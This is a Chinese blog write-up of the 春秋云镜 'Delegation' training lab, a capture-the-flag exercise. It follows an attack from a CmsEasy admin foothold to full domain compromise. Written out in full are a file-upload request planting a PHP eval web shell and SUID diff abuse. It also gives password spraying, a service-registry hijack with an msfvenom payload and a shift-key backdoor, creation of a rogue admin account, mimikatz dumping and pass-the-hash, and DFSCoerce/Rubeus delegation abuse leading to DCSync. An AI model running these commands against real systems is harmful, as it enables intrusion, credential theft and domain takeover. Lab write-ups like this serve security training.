春秋云镜-Delegation

Saofe1a

flag1


访问发现是CmsEasy

查看源代码发现版本:CmsEasy 7_7_5_20210919
/admin 使用弱口令admin/123456登录后台。在网上找到任意文件上传POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.99.154.92
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://39.99.146.97/index.php?case=admin&act=login&admin_dir=admin&site=default
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=43a650lh9t803r774eahtu1gmk; loginfalse74c6352c5a281ec5947783b8a186e225=1; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php eval($_REQUEST[1]);phpinfo();?>

蚁剑连接

diff提权,查找其用法diff | GTFOBins

1
2
find / -perm -u=s -type f 2>/dev/null
diff --line-format=%L /dev/null /home/f*/f*|

flag2

在tmp目录下上传fscan(其他目录没权限不能上传)

1
./fscan -h 172.22.4.36/24

扫描结果保存在resualt.txt里面

上传frp,然后把文件权限改成0755,不然执行不了

1
2
3
4
172.22.4.7 DC域控
172.22.4.19 FILESERVER.xiaorang.lab
172.22.4.36 外网(已拿下
172.22.4.45 XIAORANG\WIN19

有提到rockyou,用rockyou.txt字典对172.22.4.45进行密码喷洒

1
proxychains crackmapexec smb 172.22.4.45 -u 'Adrian' -p rockyou.txt -d WIN19|


拿到密码babaygirl1,但是过期了

rdp上去改密码

1
proxychains4 rdesktop 172.22.4.45 -u 'Adrian' -p 'babygirl1' -z -r disk:share=/root/tmp


直接读flag2没有权限

文件夹里有一个html文件,是份安全报告,里面有两个high风险
这里提到了当前用户可以修改这个gupdate 服务的注册表,包括更改配置、删除和创建新的配置项等

我们把这个目标exe改成木马就可以直接system了,这里我们直接通过修改shift后门绑定的文件,把shift原本会弹出的弹窗即sethc.exe改为cmd.exe

用msfvemon生成名为1.exe的木马

1
msfvenom -p windows/x64/exec cmd="C:\windows\system32\cmd.exe /c C:\Users\Adrian\Desktop\shift.bat" --platform windows -f exe-service > 1.exe

写一个shift.bat文件

1
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\1.exe" /f

将两个文件通过蚁剑上传到最开始连接的var/www/html文件夹下,rdp远程连接的机子访问http://172.22.4.36/1.exe以及shift.bat,将其下载到桌面

rdp连接的机子打开终端(不要用powershell)

1
2
3
4
5
修改注册表
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\1.exe" /f

重启服务
sc start gupdate

锁屏然后按五次shift,弹出shell,我们拿到权限

添加管理员账号

1
2
3
4
创建新用户test
net user test Abcd1234 /add
将用户test添加至管理员组
net localgroup administrators test /add


用我们刚才添加的管理员用户重新远程连接
proxychains4 rdesktop 172.22.4.45 -u 'test' -p 'Abcd1234' -z -r disk:share=/root/tmp

flag3

1
2
3
cd Desktop
privilege::debug
sekurlsa::logonpasswords

1
2
3
得到WIN19的NTLM:
5943c35371c96f19bda7b8e67d041727
5711b48b1e786446ad8218bbe617f58e


mimikatz来hash传递,弹出域用户的管理员终端

1
2
privilege::debug 
sekurlsa::pth /user:WIN19$ /domain:"xiaorang.lab" /ntlm:5943c35371c96f19bda7b8e67d041727


查询域内设置了非约束委派的机器账户:
AdFind.exe -b "DC=XIAORANG,DC=LAB" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

发现有WIN19,并且我们控制的正好是WIN19,且有system权限,那么后面的就很明确了,先让WIN19监听,上传Rubeus.exe 监听 TGT(要用管理员权限打开,也就是刚刚弹出的域用户管理员终端)
C:\Users\test\Desktop\Rubeus4.0.exe monitor /interval:1 /filteruser:DC01$ > C:\Users\test\Desktop\hash.txt
利用强认证漏洞强制DC访问WIN19,拿到其TGT票据
proxychains4 python dfscoerce.py -u "WIN19$" -hashes :5711b48b1e786446ad8218bbe617f58e -d xiaorang.lab WIN19 172.22.4.7
Rubeus 中成功接收到 DC01 的 TGT,在hash.txt文件中

1
TGT:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD5hrFyNumN+tEAj9toOLsbF+aLoqfs7Z1aesnK4GYLHHFtBhX5PfAbi4q6FCgZ+yeIjSTcbl+Xyg+g6h2IH/O9n7JU2cllZ5h+4ZOM/hkVkLXBOYZzRqT/YFvsEg2X2DIgi0sl1xUP8deXBi/u61oojQwuPkMXgSH217agRFx3gSxm31Bp9tLb2e/pq0kne6J0pVFZ8/TI8DK0+OWqeVibFJo0HNpNWvEGfP78GOYkMKsqW/NvJ0oHuHW7gHVhE6XBI/h83TuOl3QdO269haIzKhwpb1tsRu7oWcP7PIwsIrjGi5id9ZWGwBdgNcuETHTMVm68DBc4RMKDc7apDPTozjsaBId38D7tB6UcAI9BN4387IaOBeN2/c7sXlnzsotXGQsryiUoJ8wmb3HhZa8whHLYg4AWV3t1yNb4TlH2rkhfveZR7yNN8Mk9Bk7+57QB8NavwOFlsf+Nse4ugQg6DAxAzY4z9iJf+TUdaPGJ5RZRnEJi1xSGKL3MY9z7vhEn0KCQ4wRVGSfTOroMlF2aaX4hbVJ21C/gcOAVlPuMwWhh9J+7Q+/bv8QiVNp0woFeCIrCHf+xxdLLHwIfZuDjtSMnhdoeeiK0pdS7vpRkv9SiGSyEZA+1HSrDrLj2b31K1ZA1YRcgHQ1EMe2i65aLkgL3DxUAbgnhcyuJ05jWhuIfWzEeHfVGp472y+R4Tla3U4U81uZcYTe4cAROkCiGusjYSnYtVyIIuvd3lnTNtFjFflD1xWjwVhfp3AxqtNc23xmuHOuNAQ+Jm/grjWDue6vmca8ZS3bJ2lVOCOBhbgRPghPySkYECw4Yp6xIPD0Gzj0kZSdNQotlgQiwsG9NqNJ0K7INQci8xO0pMPzTWDrtajB5cMGXC5tSCNXRMj1tEdqSvdQbcyefMdTdwYM0KjGHbCOXMsJx4FlS9cn2rRa+1JUnzYy0jEeTQhocpbmyIjgx5md0XIOeO0UDCtcyzJ6oE9b/svg2Il7yDgNa5wUpMENgv6dOa2mzTTyYqx0mN3Oc3XRVkYoCGG6sfuRGNADS3OVE8vsK6CTZksPso7uyyFU6wND+TvQLX1hZSvm7Wc6jwRHmNtK2zZgsjRiJ9mQ/IaMW0CbMdEptc66Ztdz8auuEtSyJQ/oe8BV6jexd0lRTtc0g50ypq2w65vfsEO/cb5smA8ez83clau3ZGn9stJxbhQGhhKm8rb4YTbWDkgKhHSR0bqsjcHPUz6Yv4oH6f1oqatwy824iGbkB0NCxhM610vnM0qR28n2td3lFI65epRb7ou0Ul5YHZemQQ23rZHzkAyFF1cRq5eWpbZ8Yl9XjgDbc8Q8DhUoRDMUmXZ4v+Dkeh6aUA71G7vEwWllAp0RA7Jo2ct77lzvY+SEpkQAHu9osAJyCgZtacAPks4/lHjH1jGAlntJQ0g46f612Ld4EAWV6duR1zqOujgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCAVS1E/ZfVjlqDBfEniTfYjRgSqczWtXB99kp+uOrYRn6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDUyNDE1MDkzNFqmERgPMjAyNTA1MjUwMTA5MzRapxEYDzIwMjUwNTMxMTUwOTM0WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==

然后导入票据
C:\Users\test\Desktop\Rubeus4.0.exe ptt /ticket:TGT

dump哈希
mimikatz.exe "kerberos::purge" "kerberos::ptt DC.kirbi" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

得到域管的hash

1
4889f6553239ace1f7c47fa2c619c252

proxychains crackmapexec smb 172.22.4.19 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag4

proxychains crackmapexec smb 172.22.4.7 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"

  • Title: 春秋云镜-Delegation
  • Author: Saofe1a
  • Created at : 2025-05-25 00:52:56
  • Updated at : 2025-05-25 00:52:18
  • Link: https://saofeia.github.io/2025/05/25/Delegation/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
春秋云镜-Delegation